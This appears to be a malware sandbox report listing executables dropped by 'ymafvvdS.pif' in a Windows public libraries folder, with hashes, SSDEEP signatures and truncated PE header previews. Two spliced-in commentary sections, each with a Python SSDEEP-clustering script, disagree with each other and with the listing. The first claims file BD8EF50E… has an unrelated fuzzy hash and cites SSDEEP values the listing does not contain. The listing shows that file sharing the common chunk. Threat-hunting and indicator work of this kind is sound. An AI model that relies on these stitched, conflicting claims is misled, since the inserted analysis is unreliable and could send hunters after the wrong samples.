                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................K.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................
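Six of the console executables dropped by ymafvvdS.pif above are all 1142272 bytes, show the same Rich header bytes in their previews, and share nearly all of their SSDEEP signature, yet every one has a different MD5, SHA-1 and SHA-256; the previews differ in only a few header bytes, so each drop is a lightly mutated copy, and an exact-hash blocklist built from this report would miss the next one. The seventh console file (MD5 BD8EF50E24E7BA0B802BB329B6C1A438) is the same size but has an unrelated SSDEEP. The script below is an added example, not Joe Sandbox code: it parses records in the report's own Key:Value layout (five of the entries above are embedded as constructed input, with their real sizes, SSDEEP values and MD5s, trimmed to the fields the script needs) and groups them with ssdeep's comparability rule, which requires equal block sizes or one twice the other plus a common 7-character substring in the corresponding chunk hashes before ssdeep will score two signatures at all. It does not compute the ssdeep match score itself; use the python-ssdeep or ppdeep package for that. The names `parse_records`, `parse_ssdeep`, `has_common_substring`, `ssdeep_comparable`, `cluster_by_ssdeep` and `size_collisions` are chosen here and are not part of the report.

```python
"""Group the dropped files of a sandbox report by SSDEEP similarity.

Added example for this report, not Joe Sandbox code. Applies ssdeep's
comparability rule only (block sizes equal or one twice the other, plus a
common 7-character substring); the actual match score is left to the
python-ssdeep or ppdeep library.
"""
from collections import defaultdict

# Constructed input: five entries copied from the report's dropped-file list
# (sizes, SSDEEP values and MD5s are the report's own), trimmed to the fields
# used below, in the report's "Key:Value" line layout.
REPORT_TEXT = r"""
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes):1242112
SSDEEP:12288:pYdP/MXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:GdP/MsqjnhMgeiCl7G0nehbGZpbD
MD5:FEC6D29E2EA526BE7F0C118307855FA0
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):1142272
SSDEEP:12288:Ry5LXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:U5sqjnhMgeiCl7G0nehbGZpbD
MD5:1EA4645047AE86082FABC2D10DA54D3A
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):1142272
SSDEEP:12288:iKlzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:zdsqjnhMgeiCl7G0nehbGZpbD
MD5:3C48A532BA1A722EBA8FB0C1AA8B83A3
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):1142272
SSDEEP:12288:UilzXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:9dsqjnhMgeiCl7G0nehbGZpbD
MD5:E61AFD8C042A007706B30B8CFE53511D
Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Size (bytes):1142272
SSDEEP:12288:H4/OWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:Y5qYdTt/hXV0cfQ9Y4
MD5:BD8EF50E24E7BA0B802BB329B6C1A438
"""

ROLLING_WINDOW = 7  # ssdeep will not score two hashes without a 7-char common substring


def parse_records(text):
    """Turn 'Key:Value' lines into one dict per dropped file.
    Each 'Process:' line starts a new record, as in the report."""
    records, current = [], None
    for line in text.splitlines():
        line = line.strip()
        if ":" not in line:
            continue
        key, value = line.split(":", 1)
        if key == "Process":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def parse_ssdeep(sig):
    """'blocksize:chunk:double_chunk' -> (int, str, str)."""
    block, chunk, double = sig.split(":", 2)
    return int(block), chunk, double


def has_common_substring(a, b, n=ROLLING_WINDOW):
    """True if a and b share any substring of length n (ssdeep's pre-check)."""
    if len(a) < n or len(b) < n:
        return False
    grams = {a[i:i + n] for i in range(len(a) - n + 1)}
    return any(b[i:i + n] in grams for i in range(len(b) - n + 1))


def ssdeep_comparable(sig1, sig2):
    """Mirror ssdeep's eligibility rule: compare chunks computed at the same
    block size, which for a 2x size difference means chunk vs double_chunk."""
    bs1, a1, b1 = parse_ssdeep(sig1)
    bs2, a2, b2 = parse_ssdeep(sig2)
    if bs1 == bs2:
        return has_common_substring(a1, a2) or has_common_substring(b1, b2)
    if bs1 == 2 * bs2:
        return has_common_substring(a1, b2)
    if bs2 == 2 * bs1:
        return has_common_substring(b1, a2)
    return False


def cluster_by_ssdeep(records):
    """Union-find over comparable pairs; returns lists of MD5s, largest first."""
    parent = list(range(len(records)))

    def find(i):
        while parent[i] != i:
            parent[i] = parent[parent[i]]
            i = parent[i]
        return i

    for i in range(len(records)):
        for j in range(i + 1, len(records)):
            if ssdeep_comparable(records[i]["SSDEEP"], records[j]["SSDEEP"]):
                parent[find(i)] = find(j)
    groups = defaultdict(list)
    for i, rec in enumerate(records):
        groups[find(i)].append(rec["MD5"])
    return sorted(groups.values(), key=len, reverse=True)


def size_collisions(records):
    """Sizes that carry several distinct MD5s: the mark of per-drop byte
    mutation, which makes exact-hash IOCs from one report nearly worthless."""
    by_size = defaultdict(set)
    for rec in records:
        by_size[int(rec["Size (bytes)"])].add(rec["MD5"])
    return {size: len(md5s) for size, md5s in by_size.items() if len(md5s) > 1}


if __name__ == "__main__":
    recs = parse_records(REPORT_TEXT)
    for group in cluster_by_ssdeep(recs):
        print(f"{len(group)} near-identical file(s): {', '.join(group)}")
    print("sizes with several distinct MD5s:", size_collisions(recs))
```

Run against the embedded records, the GUI file and the three console files with the shared "Xc3ajG+hjQ..." chunk land in one cluster and the BD8E... file stands alone, while the size table reports four distinct MD5s at 1142272 bytes. For hunting, that argues for SSDEEP, section hashes or the behavioural indicators in this report over the per-file MD5/SHA values.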

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.024322504835932
Encrypted:false
SSDEEP:12288:H4/OWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:Y5qYdTt/hXV0cfQ9Y4
MD5:BD8EF50E24E7BA0B802BB329B6C1A438
SHA1:ED2DC2D1E2BA1B9C53F9A43A226A0E9724B2D154
SHA-256:14600AD51F85884F02E159FC24A1C5BE6322644A1F025458C379837C285A3C7B
SHA-512:B7FF6F94C588B3E8032EA0930F539B16F0BD0366CEA8410B7722296630F908026E4DD647D3811A5ADFB0FA291244219FF42869D856BEF35AE08AAC3A47144685
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................9.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.024210821674783
Encrypted:false
SSDEEP:12288:dom+WZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:mAqYdTt/hXV0cfQ9Y4
MD5:F1FCF36A1F55F97E161F21773590FF82
SHA1:946222D6DB3F509EBE4F1FA7D7CDDE86C3C8B497
SHA-256:4AEFF61E05A8E9F98A8338D0CD9E1734B584EC81EEA8C3E8C7447E8E5D30AC1C
SHA-512:53EA21FAFDCC972B3751AA0EC822F766E0FA3A1D48BFFF0D9FAA368DC4002A9F8ED3DD596F52E734E6CDC1B4A3DDEBEC5346F7AD01A610E469F2B4382D764B55
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..P............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...P....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.024270674429157
Encrypted:false
SSDEEP:12288:3tSWWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:dsqYdTt/hXV0cfQ9Y4
MD5:24DCF93BA4C492216B0C05693B38F5CE
SHA1:BAD5540DA1F1A8A804907E8F58993A5040A13534
SHA-256:3BC552DFAE5306954DAC95730B354866C49E9AE17D151435124FC9432D600A25
SHA-512:B796E8B120594A789C0EE1E54F3789DF259D36E079793362313DF1007F29CE97A6BDC3B11C93F09DE99F1E8548D74197DA32AD5D4F9110C885EDED9542751945
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................7L.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142272
Entropy (8bit):5.024334243918023
Encrypted:false
SSDEEP:12288:ls/OWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:y5qYdTt/hXV0cfQ9Y4
MD5:8DA0B9E41E7E5BF91EE408A3CD267AF2
SHA1:232D8BC38C70BAFEC93F916239E8AD57AC422C58
SHA-256:32C224101E5107BECA951E90B80667E3CD76316B293EDE0AF2E490F9F5AC202F
SHA-512:DC980E2A9D151073538AC365949D2111DC23C1F5C208E72C52A1689B244E8B800A129D2A90B4403753278AC98CCB1213FC81CA6E70EC43664BEBE3849C897525
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................m`.......................................&.......@..p............................"..T............................!..@............ ...............................text............................... ..`.rdata..F.... ......................@..@.data........0....... ..............@....rsrc...p....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1202688
Entropy (8bit):5.089522316085537
Encrypted:false
SSDEEP:12288:As8WZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:AsTqYdTt/hXV0cfQ9Y4
MD5:1BFF2EFC59E2043DA239B02DF3580F6B
SHA1:E77A5C6799945E784F05FEE3364C82D4D9B48876
SHA-256:DFC5108314439EB04EA4D9A61EE36F14347A5D6D2468105E88F91CB381C1D414
SHA-512:3A67180B621D19F8F6DA8F97CBA34B6CC217272C98235871627529C5E4B854337AC2009ECB952313075E7D3BA5A3D341FBFBA2733B35C23191E2752B52754F11
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......zGG.>&).>&).>&).7^..*&).\^(.<&).\^-.3&).\^*.=&).*M-.?&).*M(.7&).>&(.&).\^,..&)._,.:&)._..?&)._+.?&).Rich>&).........PE..L...M.d.................|...........u............@............................................................................@....0..............................H...T...............................@...............P...P........................text...L{.......|.................. ..`.rdata.............................@..@.data........ ......................@....rsrc........0......................@..@.reloc...P...@...@..................@...................................................................................................................................................................................................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1142784
Entropy (8bit):5.023660644416309
Encrypted:false
SSDEEP:12288:fNQCWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:FOqYdTt/hXV0cfQ9Y4
MD5:C5A201A95E66CE2DC2C92E1A3EEBAFE6
SHA1:557B39980733FD7FE076B23856299F29597E8AAC
SHA-256:1E9D8C351DA8C7B83DBD6061AAEA5A472554703875740456542D3A4EC6C76B2E
SHA-512:BBF3F1A5D496CC0D34901BE0A7EB5A3553AD8AA1521A37F1F0CB7E00425EDD926332E9CEFCEB5D9BB3E23CA77A620C36F2DD5B07AC941374237A2D1A6CB7F419
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................... ............... ....@..........................................................................'.......@..h...........................8#..T...........................x"..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0......."..............@....rsrc...h....@.......$..............@..@.reloc...P...P...@...0..............@...................................................................................................................................................................................................................................................................................................

Process:C:\Users\Public\Libraries\ymafvvdS.pif
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1298944
Entropy (8bit):5.241045179668471
Encrypted:false
SSDEEP:12288:XCXN7D5GqS2AroAoWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:Xi7lG3roA3qYdTt/hXV0cfQ9Y4
MD5:88DB6C800D724E4BB2B39AB4CF5BCD99
SHA1:287FEE95318F9CF542E87191F03EB75EB4F787A5
SHA-256:D64BE016C85268C38037165E9B23FB3FE37185F9A31D2F71A54E17A2BB9A7175
SHA-512:61E6563FD3C0BE90ABF91E46435FC78DBC63186496CC9ABF3725BE1B39FBC5A7D1617128A055117F0A709FD6DCC299ED3167EB4B5AE4F4D8A7B17243BACDA681
Malicious:true
Reputation:unknown
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........n...........................................................................................Rich............................PE..L.....d............................A.............@..........................0..........................................................D............................e..8............................e..@............................................text...D........................... ..`.rdata..5...........................@..@.data................f..............@....idata...............v..............@..@.00cfg..............................@..@.rsrc...D...........................@..@.reloc...P.......@..................@...........................................................................................................................................................................................................
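Every dropped file above carries a different MD5, SHA-1 and SHA-256, yet their SSDEEP values share the same second chunk (`qYdTt/hXV0cfQ9Y4`) and a long common run in the first chunk (`WZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4`): the loader is writing near-identical PE variants, so a blocklist built only from the cryptographic hashes in this report will miss the next copy. The script below is an added example, not part of the Joe Sandbox report or of any Joe Security tooling. It parses records in the report's own `Key:Value` layout, clusters them by fuzzy hash and emits the SHA-256 set for the cluster. The seven record fragments in `SAMPLE_RECORDS` are copied from the listing above (only the size, SSDEEP and SHA-256 fields are kept; the full SHA-512 and Preview fields are omitted). The similarity rule is an assumption for illustration: ssdeep's real scoring is a weighted edit distance, and this code only applies its precondition, a shared 7-character substring at a compatible block size, so it says "related or not" rather than producing a 0-100 score.

```python
"""Cluster Joe Sandbox dropped-file records by SSDEEP (added example, not report code)."""
from typing import Dict, List, Tuple

# Constructed input: seven of the dropped-file records from the report above,
# reduced to the three fields this script uses. Values are the report's own.
SAMPLE_RECORDS = """\
Size (bytes):1142272
SSDEEP:12288:H4/OWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:Y5qYdTt/hXV0cfQ9Y4
SHA-256:14600AD51F85884F02E159FC24A1C5BE6322644A1F025458C379837C285A3C7B

Size (bytes):1142272
SSDEEP:12288:dom+WZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:mAqYdTt/hXV0cfQ9Y4
SHA-256:4AEFF61E05A8E9F98A8338D0CD9E1734B584EC81EEA8C3E8C7447E8E5D30AC1C

Size (bytes):1142272
SSDEEP:12288:3tSWWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:dsqYdTt/hXV0cfQ9Y4
SHA-256:3BC552DFAE5306954DAC95730B354866C49E9AE17D151435124FC9432D600A25

Size (bytes):1142272
SSDEEP:12288:ls/OWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:y5qYdTt/hXV0cfQ9Y4
SHA-256:32C224101E5107BECA951E90B80667E3CD76316B293EDE0AF2E490F9F5AC202F

Size (bytes):1202688
SSDEEP:12288:As8WZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:AsTqYdTt/hXV0cfQ9Y4
SHA-256:DFC5108314439EB04EA4D9A61EE36F14347A5D6D2468105E88F91CB381C1D414

Size (bytes):1142784
SSDEEP:12288:fNQCWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:FOqYdTt/hXV0cfQ9Y4
SHA-256:1E9D8C351DA8C7B83DBD6061AAEA5A472554703875740456542D3A4EC6C76B2E

Size (bytes):1298944
SSDEEP:12288:XCXN7D5GqS2AroAoWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:Xi7lG3roA3qYdTt/hXV0cfQ9Y4
SHA-256:D64BE016C85268C38037165E9B23FB3FE37185F9A31D2F71A54E17A2BB9A7175
"""

# ssdeep refuses to score two signatures unless they share a 7-character
# substring; this example stops at that precondition (an assumption, not
# ssdeep's real edit-distance score).
MIN_MATCH = 7


def parse_records(text: str) -> List[Dict[str, str]]:
    """Turn blank-line-separated 'Key:Value' blocks into one dict per record."""
    records: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        # Split on the first ':' only; SSDEEP values and Windows paths contain ':'.
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records


def parse_ssdeep(sig: str) -> Tuple[int, str, str]:
    """Split 'blocksize:chunk:double_chunk' into its three parts."""
    block, chunk, double_chunk = sig.split(":", 2)
    return int(block), chunk, double_chunk


def _shares_ngram(a: str, b: str, n: int = MIN_MATCH) -> bool:
    """True if the two chunk strings have any n-character substring in common."""
    grams = {a[i:i + n] for i in range(len(a) - n + 1)}
    return any(b[i:i + n] in grams for i in range(len(b) - n + 1))


def ssdeep_related(sig_a: str, sig_b: str) -> bool:
    """Compare chunks at compatible block sizes, as ssdeep does before scoring."""
    bs_a, a1, a2 = parse_ssdeep(sig_a)
    bs_b, b1, b2 = parse_ssdeep(sig_b)
    if bs_a == bs_b:
        return _shares_ngram(a1, b1) or _shares_ngram(a2, b2)
    if bs_a == 2 * bs_b:          # a's chunk covers the same span as b's double chunk
        return _shares_ngram(a1, b2)
    if bs_b == 2 * bs_a:
        return _shares_ngram(a2, b1)
    return False


def cluster_by_ssdeep(records: List[Dict[str, str]]) -> List[List[Dict[str, str]]]:
    """Greedy single-linkage clustering: join the first cluster with a related member."""
    clusters: List[List[Dict[str, str]]] = []
    for rec in records:
        for cluster in clusters:
            if any(ssdeep_related(rec["SSDEEP"], m["SSDEEP"]) for m in cluster):
                cluster.append(rec)
                break
        else:
            clusters.append([rec])
    return clusters


def ioc_sha256(records: List[Dict[str, str]]) -> set:
    """SHA-256 blocklist for the records (exact-match IOCs, to pair with the cluster)."""
    return {r["SHA-256"] for r in records if "SHA-256" in r}


if __name__ == "__main__":
    recs = parse_records(SAMPLE_RECORDS)
    for i, cluster in enumerate(cluster_by_ssdeep(recs), 1):
        sizes = sorted({r["Size (bytes)"] for r in cluster})
        print(f"cluster {i}: {len(cluster)} files, sizes {sizes}")
        for r in cluster:
            print("   ", r["SHA-256"])
```

Run against the seven records the script reports a single cluster spanning four distinct file sizes, which is the practical signal: keep the exact hashes for retrospective matching, but hunt on the fuzzy-hash cluster and on the drop location (`C:\Users\Public\Libraries\ymafvvdS.pif` writing PE files) rather than on any one SHA-256.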
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1269248
                                                                                                                                                                                                                        Entropy (8bit):5.2783484948471715
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:H5bfQFUWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:HNfQFbqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:F0FEC544C5C145AF8E27D959E33C76DD
                                                                                                                                                                                                                        SHA1:9E426C49FB22147141288DA3381116184CA34E12
                                                                                                                                                                                                                        SHA-256:8DA454FCBBED832F396481F21CF90E04086AE9601E4491F1973462835B987664
                                                                                                                                                                                                                        SHA-512:5BABD03FFF6EBC8C62ABC1EF9B2AF5DD9410A0E2DFE6C50FB96C2342598D7F519C7F23B557AC3CDCC1E16B731084CBDD192BD56D1BB56071E8C92732F6BDFEA9
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X.u.....................|.......|.......|.......|...?.......................................y.......y.......y.......Rich............................PE..L...-1.e............... ..........................@..................................9......................................d...........................................8...............................@...............,............................text............................... ..`.rdata..4a.......b..................@..@.data........ ......................@....reloc...`...@...P..................@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1287680
                                                                                                                                                                                                                        Entropy (8bit):5.295155314582601
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:fNmt0LDILi2yJWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:CLikqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:E8DC9D8F1FB838925BA9070B37F6E944
                                                                                                                                                                                                                        SHA1:2C44AE14D0F0B59EC829E119E3291D539A600810
                                                                                                                                                                                                                        SHA-256:329ED32116101025EE6597ED5E995C6CF5EFA440F7BCB1B0F2894D32514A46D3
                                                                                                                                                                                                                        SHA-512:C49C392CC294B43190FDA0C470C0CF009C2E41D6D3572DE37D884BD531442436FA6D4BC749036EB27FDC05E6B18B1029F5CF010F430E591284079560ED9DE3E9
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@.................................L............ ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1287680
                                                                                                                                                                                                                        Entropy (8bit):5.295148067762896
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:ZNmt0LDILi2yJWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4:8LikqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:2DFBE8C9A5A7DAAF732FEB6E66DE8A3A
                                                                                                                                                                                                                        SHA1:F3A5EE35B542BE029D95BDAD2F3EE1A75D7C6E49
                                                                                                                                                                                                                        SHA-256:C06626191BAE81B60FA8717969D08D7994BBF838508B4F33B01390432E46283F
                                                                                                                                                                                                                        SHA-512:DF87A9742585CFDF8FD82ECADDE49B47F3153B66D4B156D298962049AE5785573CA81A61A547676217D92BEF57B6D674DBF049FF54CB8467326A8E14625A5C7B
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......,3.zhR.)hR.)hR.)a*.)`R.). .(nR.). .(wR.). .(oR.)hR.).V.). .(AR.). o)jR.). .(xR.). m)iR.). .(iR.)RichhR.)................PE..L...I.6..................&...H......`........@....@..................................4........... ...........................Q.......`..(...........................`^..T....................B..........@............P...............................text....$.......&.................. ..`.data........@.......*..............@....idata..l....P.......2..............@..@.rsrc...(....`.......@..............@..@.reloc...p...p...`...F..............@...................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1343488
                                                                                                                                                                                                                        Entropy (8bit):5.227684907524971
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:VjuozvMGNUbT8WZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHiKQn9Y4R:NfQqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:5770BEBF38267AF647211DF3C51D781E
                                                                                                                                                                                                                        SHA1:298A3E5E39BDC1E7DB688E93A3C73BF2910877B5
                                                                                                                                                                                                                        SHA-256:89B6E2BFE44503189272D311EEB06AFAB02FA629885023F2B01E199D6B6EB67E
                                                                                                                                                                                                                        SHA-512:97C05F02A46CC66C0AA5D85DFE2B43C684F2ED7B0D45357A19CE4E53EF76EFEE466C74D4AD4A98F245FA300743B8295B0EECCEEB10D0EE0D948CDC934EF8E1F4
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... .(.d.F.d.F.d.F.m..l.F...B.h.F...E.`.F...C.{.F...G.c.F.d.G...F...N.M.F.....f.F.....e.F...D.e.F.Richd.F.................PE..d....~0/.........."..........P.................@....................................6..... .......... ...................................... ........ ..(...............................T....................e..(...`d..8............e...............................text............................... ..`.rdata..............................@..@.data...@...........................@....pdata..............................@..@.rsrc...(.... ......................@..@.reloc...p...0...`... ..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):1496064
                                                                                                                                                                                                                        Entropy (8bit):5.57031954499461
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12288:uWmt0LDdOUO42ZdoruI4kxBgGOzWZkYgb4+m+5HDL72ntF/YLKkLzEwBkx0o0GHE:ubUO42y/EKqYdTt/hXV0cfQ9Y4
                                                                                                                                                                                                                        MD5:9E74F7AF73B0A39717595A334757FEF7
                                                                                                                                                                                                                        SHA1:761CC934EC8D3A1D6638CE211229980BF2DBAF01
                                                                                                                                                                                                                        SHA-256:03CA11BC35D299FDD06800B630950AEB20F4BDAAF74E0627E687B7F1884B63AB
                                                                                                                                                                                                                        SHA-512:8A2CC602BF6D0FD2B58F6ABE2EFF30B08F1310D44A5DE1992D374A6135E773A663786EC8BC0C0725F4652F9EFA1646C58BE52553144087E304F0C5C89B68DEC6
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......X..i.v.:.v.:.v.:...;9v.:...;.v.:...;.v.:.v.:.v.:...;$v.:...;4v.:...:.v.:...;.v.:Rich.v.:........................PE..L......m.................0...|...............@....@.......................... ......t............ ......................................................................T...................`[..........@............p...............................text...l/.......0.................. ..`.data...@'...@.......4..............@....idata..@....p.......L..............@..@.c2r.................\...................rsrc................^..............@..@.reloc...........p...d..............@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\ymafvvdS.pif
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):52712960
                                                                                                                                                                                                                        Entropy (8bit):7.961781850126838
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1572864:kKjL44lyBc+UN0qRsMjDAY9d5o/paLXzHLe:HicZmsR3Lo/cnLe
                                                                                                                                                                                                                        MD5:54715B051FAA31E9E953B5BB68629E4A
                                                                                                                                                                                                                        SHA1:E25C1575EE712B71C3EC53CB27405F9DF749803A
